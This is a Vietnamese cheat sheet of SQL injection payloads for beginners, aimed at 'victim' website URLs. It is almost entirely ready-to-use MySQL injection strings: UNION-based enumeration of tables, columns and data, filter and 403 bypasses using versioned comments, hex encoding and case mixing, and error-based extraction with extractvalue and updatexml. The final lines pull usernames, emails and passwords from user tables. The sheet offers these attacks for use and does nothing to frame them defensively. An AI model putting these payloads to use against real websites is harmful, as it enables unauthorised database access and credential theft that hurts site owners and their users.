Một số dạng sqli dành cho newbie

------------------------------------ ***Dạng Basic "and=0":
**Order lỗi : id=123 and=0 UNION SELECT 1,2-- -
Get table,column,data như bt thêm "and=0" sau id.
***********Dạng /*!Union*/ /*!Select*/ :
**Tìm Order lỗi :link victim null(-null,-id) /*!Union*/ /*!Select*/ 1,2,3...-- - **Get database :link victim /*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!table_name*/) from information_schema./*!tables*/ where table_schema=database()-- -
**Get Colum:link victim /*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!column_name*/) 4,5... from information_schema./*!columns*/ where /*!table_name*/=0x mã hex table-- -
**Get data :link victim /*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!tên cột,0x7c,tên cột,0x7c,tên cột,0x7c*/) from tên table-- -
**********Bypass nâng cao dạng /*!Union*/ /*!Select*/ loại ẩn:
***Order lỗi : id=-... /*!Union*/ /*!Select*/ 1,2,3...-- -
***Get database :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
***Get table :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
***Get column:id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!column_name*/))),3 from information_schema./*!columns*/ where /*!table_name*/=0x...()-- -
***Get data :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!tên cột,0x7c,tên cột,0x7c*/))),3 from table -- -
***************Dạng Bypass "=" chặn ẩn :
***Order lỗi :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,3,4-- -
***Get database:id=-..../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000table_name*/))),4 from information_schema. /*!50000tables*/ where /*!50000table_schema*/ like database()-- -
***Get column:id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000column_name*/))),4 from information_schema. /*!50000columns*/ where /*!50000table_name*/ like 0x...()-- -
***Get Data :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000tên cột,0x7c,tên cột,0x7c*/))),4 from table-- -
********************Dạng Bypass 403 limit ***(Khó)
Order lỗi :id=-1' /*!50000union select*/ 1,2,3,4 -- -
Get table:id=-1' /*!50000union select*/ 1,2,3,concat_ws(0x7c,table_name) from information_schema.tables where table_schema=database() limit 1,1-- - ( Để biết thêm table tăng limit lên 1,1-2,1-3,1...)
Get column:id=-1' /*!50000union select*/ 1,2,3,concat_ws(0x7c,column_name) from information_schema.columns where table_name=0x... limit 1,1-- -(Tăng limit)
Get data :id=-1' /*!50000union select*/ 1,2,3,concat_ws(0x7c,tên cột,tên cột) from tên table -- -
----------------------------------Bypass 403 limit ****(cực kì khó)*****
***Tìm order lỗi :id=-1 /*!50000union select*/ 1,2,3-- -
***Get table:id=-1 /*!50000union select*/ 1,2,unhex(hex(concat_ws/*!(0x7c,table_name))) from /*!information_schema*/.tables where table_schema=database() limit 0,1-- -
***Get column:id=-1 /*!50000union select*/ 1,2,unhex(hex(concat_ws/*!(0x7c,column_name))) from /*!information_schema*/.columns where table_name=0x... limit 0,1-- -
***Get data:id=-1 /*!50000union select*/ 1,2,unhex(hex(concat_ws/*!(0x7c,tên cột,tên cột))*/) from tên table-- -
****Bypass Filter khó (1 order or nhiều order ) :
***Get table :id=-1 Union Select group_concat(table_name) FrOm infOrMation_schema.tables
***Get Column :id=-1 Union Select group_concat(column_name) FrOm infOrMation_schema.tables where table_name=0x...-- -
Get Data:id=-1 Union Select group_concat(tên cột,0x7c,tên cột,0x7c) FrOm tên table-- -
Dạng id=-1 order by ....-- - không tìm được Order lỗi thì Biến đổi thành id=1' order by
- rồi khai thác Bt.
~~~>K Get dk table thì id=-1' .... rồi khai thác BT.
***************Dạng Table ẩn (UnIoN SeLeCT):
**Order lỗi : id=-... UNION SELECT 1,2,3,...-- -
**Get Database :id=-... UNION SELECT 1,2,database(),4,...-- - (Thay database() vào order lỗi ).
**Get Table :id=-... UNION SELECT 1,2,unhex(hex(group_concat(table_name))),3,4,... from information_schema.tables where table_schema=database()-- -(Thêm unhex(hex nếu table dạng ẩn )
**Get column :id=-... UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,... from information_schema.columns where table_name=0x mã hex table-- -
**Get data :id=-... UNION SELECT 1,2,unhex(hex(group_concat(tên cột,0x7c,tên cột,0x7c,tên cột))),4,5,6,7,8,9,10,11,12,13 from tên table-- -
****************XPath Injection(erro base) :
1.and extractvalue(rand(),concat(0x7c,version(),0x7c,database(),0x7c,user()))-- -
2.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))-- -
3.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns where table_name=0x"table" limit 0,1)))-- -
4.and extractvalue(rand(),concat(0x7c,(select concat("column",0x7c,"column") from "table" limit 0,1)))-- -
***Dạng Bypass Xpath( Khó )
1.' and extractvalue(rand(),concat/*!(0x7c,version(),0x7c,database(),0x7c,user())*/)-- - 2.' and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,table_name) from /*!information_schema*/.tables where table_schema=database() limit 0,1)))-- -
3.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,column_name) from /*!information_schema*/.columns where table_name=0x"table" limit 0,1)))-- -
4.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!("column",0x7c,"column") from "table" limit 0,1))*/)-- -
*****************XPath Injection(erro base Cao Cấp )
1.or 1 group by concat(0x2f,version(),0x2f,database(),0x2f,user(),0x2f,floor(rand(0)*2)) having min(1) or 1-- -
2.and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -
3.and updatexml(0,concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns WHERE table_name=0x... limit 0,1)),0)-- -
4.and updatexml(0,concat(0x7c,(select concat(email,0x7c,password) from tên table limit 0,1)),0)-- -
Khai thác SQL = Erro Base
Khai thác SQL = Erro Base
Khai thác SQL Blind :
sqli form search(tùy site)
'and p.published =-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -
'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=database()-- -
'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name=0x62635f7573657273-- -
'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(username,0x2f,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from bc_users-- -

